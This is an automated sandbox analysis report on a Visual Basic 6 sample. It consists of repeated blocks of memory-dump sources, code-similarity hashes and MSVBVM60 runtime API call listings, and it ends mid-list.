                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$CopyUnlock$#616#631BstrErrorListSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1554985673-0
                                                                                    • Opcode ID: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
                                                                                    • Instruction ID: babe0322a797a5b6fd9da037fd94c9e8bb3a8b55dbd2c7b94b419f711927b1e7
                                                                                    • Opcode Fuzzy Hash: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
                                                                                    • Instruction Fuzzy Hash: A741A575A04114DFC724DFA4ED849EE77B9EF48300F10456BE505A3261DB785986CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
                                                                                    • Instruction ID: 2258cb0996f04db46dac934d03965dd60a716a157fe6f4ee4cac8ab8ed0125e9
                                                                                    • Opcode Fuzzy Hash: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
                                                                                    • Instruction Fuzzy Hash: 73316EB1A00119DFCB14DFA4ED84DEE7B79EF88300F50856AE506E3261DB385986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
                                                                                    • Instruction ID: 1778df844528236c0a987ac4d2ed461284e935b427befae0ad271591413caba1
                                                                                    • Opcode Fuzzy Hash: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
                                                                                    • Instruction Fuzzy Hash: A13150B5A00119DFCB14DFA4ED84DEE7779EF88300F10856AE506E3261DB385986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
                                                                                    • Instruction ID: f2cb84cfdc36a53c26a53c404fdd6523f55abe18ffc8f9b7dbfd1f77219752b6
                                                                                    • Opcode Fuzzy Hash: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
                                                                                    • Instruction Fuzzy Hash: FD315075A00119DFCB14DFA4ED94DEE7779EF88300B10456AE506E3261DB349986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
                                                                                    • Instruction ID: 6a6c65185a8990ed76a7925615099f76a1e8909006d367d433fa78fd926de25a
                                                                                    • Opcode Fuzzy Hash: 07de24749f671f96814f1a4586ac660af873eea27dc505617471f5a8f1a16d63
                                                                                    • Instruction Fuzzy Hash: 70318071A00158DFCB14DBE4ED84DEE7B79EF88300B10456AE505E3261DA345986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
                                                                                    • Instruction ID: 866caa4c8eac6f19f1194a02b11e2fb1ed896fcf014f3bed80b5db7ea06780d3
                                                                                    • Opcode Fuzzy Hash: 77e56cfcc552817e7ee37a59d80ef930704b94eed13a9294e71aa4068a8ebed6
                                                                                    • Instruction Fuzzy Hash: A53160B1A00158DFCB14DBA4ED94DEE7B79EF88300F10856AE506A3261DB345986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    • Opcode ID: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
                                                                                    • Instruction ID: b6ea956760585b48cef5c944cb0b6b88b320cc0c6bf33020a7601fb965c6dcd1
                                                                                    • Opcode Fuzzy Hash: 7c020b0f20d6a8b4d01058b6d9886427e5cc45ac16c8490aeb7492273ba51688
                                                                                    • Instruction Fuzzy Hash: B33172B1A00118DFCB14DFA4ED84DEE7779EF88300F10456AE506E3261DB345986CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
